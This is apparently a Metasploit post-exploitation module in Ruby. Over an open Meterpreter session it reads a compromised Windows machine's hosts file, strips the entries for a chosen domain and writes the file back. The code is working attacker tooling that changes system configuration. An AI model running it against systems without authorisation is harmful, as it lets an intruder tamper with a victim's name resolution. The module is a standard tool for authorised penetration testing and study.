Path: blob/master/modules/post/windows/manage/remove_host.rb
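##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Post
  # Every line is written back with this terminator (the original module
  # always emitted CRLF), regardless of what the target's file used.
  LINE_ENDING = "\r\n".freeze

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Windows Manage Host File Entry Removal',
        'Description' => %q{
          This module allows the attacker to remove an entry from the Windows hosts file.
        },
        'License' => BSD_LICENSE,
        'Author' => [ 'vt <nick.freeman[at]security-assessment.com>'],
        'Platform' => [ 'win' ],
        'SessionTypes' => [ 'meterpreter' ],
        'Compat' => {
          'Meterpreter' => {
            'Commands' => %w[
              core_channel_close
              core_channel_eof
              core_channel_open
              core_channel_read
              core_channel_tell
              core_channel_write
            ]
          }
        },
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'SideEffects' => [CONFIG_CHANGES],
          'Reliability' => []
        }
      )
    )

    register_options(
      [
        OptString.new('DOMAIN', [ true, 'Domain name to remove from the hosts file.' ])
      ]
    )
  end

  # Absolute path of the target's hosts file.
  #
  # Resolves %SystemRoot% first, then %windir%, and falls back to the stock
  # install location when neither environment variable is set.
  #
  # @return [String] Windows path to the hosts file
  def hosts_path
    root = client.sys.config.getenv('SystemRoot') ||
           client.sys.config.getenv('windir') ||
           'C:\\Windows'
    "#{root}\\System32\\drivers\\etc\\hosts"
  end

  # Removes every hosts-file entry naming DOMAIN and writes the file back.
  #
  # The file is only rewritten when at least one entry was actually
  # removed; a miss is reported and leaves the target untouched.
  def run
    hosttoremove = datastore['DOMAIN'].to_s.strip
    fail_with(Failure::BadConfig, 'DOMAIN must not be blank') if hosttoremove.empty?

    path = hosts_path
    print_status("Removing hosts file entry pointing to #{hosttoremove}")

    newfile, removed = remove_host_entries(read_remote_file(path), hosttoremove)
    if removed.zero?
      print_status("No hosts file entry for #{hosttoremove} found in #{path}; file left unchanged")
      return
    end

    write_remote_file(path, newfile)
    print_good("Done! Removed #{removed} #{removed == 1 ? 'entry' : 'entries'} for #{hosttoremove}")
  end

  private

  # Rewrites the raw hosts-file text without +host+.
  #
  # A hosts line is an address followed by one or more hostnames and an
  # optional '#' comment. Hostname comparison is case-insensitive, the
  # address field is never matched, and a line left with no hostname is
  # dropped entirely (a bare address is not a valid entry). Lines that do
  # not name +host+ are copied through unchanged.
  #
  # @param contents [String] hosts file as read from the target
  # @param host [String] hostname to remove
  # @return [Array(String, Integer)] rewritten contents and the number of
  #   lines that were modified or dropped
  def remove_host_entries(contents, host)
    removed = 0
    # Accept LF as well as CRLF so a hand-edited file is still parsed per line.
    kept_lines = contents.split(/\r?\n/).each_with_object([]) do |line, out|
      entry, comment = line.split('#', 2)
      address, *names = entry.to_s.strip.split(/\s+/)

      unless names.any? { |name| name.casecmp?(host) }
        out << line
        next
      end

      removed += 1
      remaining = names.reject { |name| name.casecmp?(host) }
      next if remaining.empty?

      rebuilt = [address, *remaining].join(' ')
      # Keep the '#' marker; without it the comment text would be parsed
      # as additional hostnames on the rewritten line.
      rebuilt += " ##{comment}" if comment
      out << rebuilt
    end

    [kept_lines.map { |l| "#{l}#{LINE_ENDING}" }.join, removed]
  end

  # Reads the whole remote file, closing the handle even if a read fails.
  #
  # @param path [String] remote path
  # @return [String] file contents
  def read_remote_file(path)
    fd = client.fs.file.new(path, 'rb')
    data = ''
    until fd.eof?
      chunk = fd.read
      # Guard against a channel that reports data exhausted before eof?.
      break if chunk.nil? || chunk.empty?

      data << chunk
    end
    data
  ensure
    fd.close if fd
  end

  # Uploads +data+ to +path+ through a local temporary file, which is
  # deleted afterwards so no copy of the target's hosts file lingers on disk.
  #
  # @param path [String] remote path
  # @param data [String] new file contents
  def write_remote_file(path, data)
    meterp_temp = Tempfile.new('meterp')
    meterp_temp.binmode
    meterp_temp.write(data)
    meterp_temp.close # flush before upload_file reads it back
    client.fs.file.upload_file(path, meterp_temp.path)
  ensure
    meterp_temp.close! if meterp_temp
  end
end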